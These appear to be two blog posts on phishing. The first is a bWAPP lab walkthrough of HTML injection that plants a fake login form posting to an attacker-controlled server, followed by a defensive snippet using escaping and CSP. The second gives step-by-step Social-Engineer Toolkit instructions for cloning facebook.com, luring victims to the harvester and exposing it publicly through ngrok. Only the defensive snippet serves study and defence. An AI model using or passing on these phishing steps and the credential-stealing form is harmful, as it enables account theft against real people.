HTML injection (Hyper Text Markup Language injection) is a vulnerability that allows an attacker to inject arbitrary HTML into a page through a parameter that is reflected without being escaped. HTML injection is also referred to as virtual defacement of a web application.

Possible attack scenarios are demonstrated below:

  1. An attacker finds a vulnerable parameter and injects HTML into the page.
  2. An attacker builds a phishing page on the vulnerable website and sends the link to the victim by email.
  3. The victim trusts the domain, enters their user ID and password, and the injected form sends them to the attacker's server.

So lets start ..

  1. First you need to find a website that is vulnerable to HTML injection. Here I am using the bWAPP lab.
  2. I have opened the page that is vulnerable to HTML injection. Just add your HTML code to the parameter.

3. As you can see, I added the simple code <h1> ahmed </h1> and it was rendered as a heading instead of being shown as text.

4. Now let's try some more HTML tags, such as bold, colour, background, etc.

I modified its look using some basic tags. You can also perform an XSS attack through HTML injection by injecting a <script> tag instead of plain markup.

So let's try to create a login form using this code.

<form action="http://127.0.0.1/login.php" method="POST">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login"></form>

Make it look like any page, or add your deface page; the only thing you must change is the location the form posts to, i.e. the action attribute, which should point at a server you control:

<form action="http://127.0.0.1/login.php" method="POST">

Just login with any username and password and see what happens.

This page is shown to the victim after login 🙁 and we have successfully got the ID and password.
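The vulnerable reflection beside its fix, as an added example (my code, not bWAPP's): output escaping, plus a Content-Security-Policy form-action restriction as a second layer that stops an injected form from posting off-site even where escaping is missed. The page template and the exact header value are assumptions made for the example; the form is the one from this post.

```python
import html

# The phishing form from the post above, as the attacker would submit it in the parameter.
PHISH = ('<form action="http://127.0.0.1/login.php" method="POST">'
         'Username: <input type="text" name="username"><br>'
         'Password: <input type="password" name="pass"><br>'
         '<input type="submit" value="Login"></form>')


def render_unsafe(name):
    """bWAPP-style reflected page (assumed template): the parameter lands in the HTML untouched."""
    return f"<p>Welcome {name}</p>"


def render_safe(name):
    """The fix: escape on output, so markup in the input is displayed as text rather than parsed."""
    return f"<p>Welcome {html.escape(name, quote=True)}</p>"


def security_headers():
    """Second layer (assumption about the deployment): forbid forms from posting anywhere but
    this origin, which neuters the injected login form even if one output path forgets to escape."""
    return {"Content-Security-Policy": "default-src 'self'; form-action 'self'"}


def contains_form(rendered):
    """Crude check used here to show the difference: is there a live <form> tag in the output?"""
    return "<form" in rendered.lower()
```

Escaping turns every < into &lt; so the browser never creates a form element; the form-action directive covers the case where a different template reflects the same value unescaped.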

Keep Learning.. and Injecting but don’t harm an site.

Hack Facebook Account With SET Toolkit in kali Linux

Welcome back guys, today in this post I am going to show you how to hack a Facebook account with the SET toolkit. Please note that the Social-Engineer Toolkit doesn't exploit any software vulnerability; it exploits the human element of security.

You can use SET to phish a Facebook account or any other type of website.

Here I am using Kali Linux as an attacker machine.

so lets start our work. 🙂 and follow me step by step.

  • Start SET in Kali Linux with the command "setoolkit". You will get the main menu.

  • Press 1 (Social-Engineering Attacks), then choose Website Attack Vectors, then press 3 for the Credential Harvester Attack Method.
  • Press 2 for Site Cloner; it will then ask for the IP address the harvester should listen on.
  • Enter your IP address (you can find it with the ifconfig command). Here we are going to clone facebook.com, so give https://www.facebook.com as the URL to clone.

  • Enter all of these and press Enter.
  • Our SET harvester is now starting.
  • As I already told you, SET doesn't exploit any vulnerability; it exploits the human element of security. Give your IP address to the victim with some social engineering; when they open it our phishing page appears, and when they log in we get their ID and password. For example, here I am opening the attacker IP address from my Windows machine.

After the victim logs in, the captured password is saved in the "/var/www" directory (SET prints the file it writes to in its console).

Note: with a private IP address this only works on the same network. If you want it reachable from anywhere you can use a secure tunnel on port 80 with ngrok, PageKite, etc.

please Don’t try for illegal purposes this is for educational purpose only. If anything happens than I am not responsible.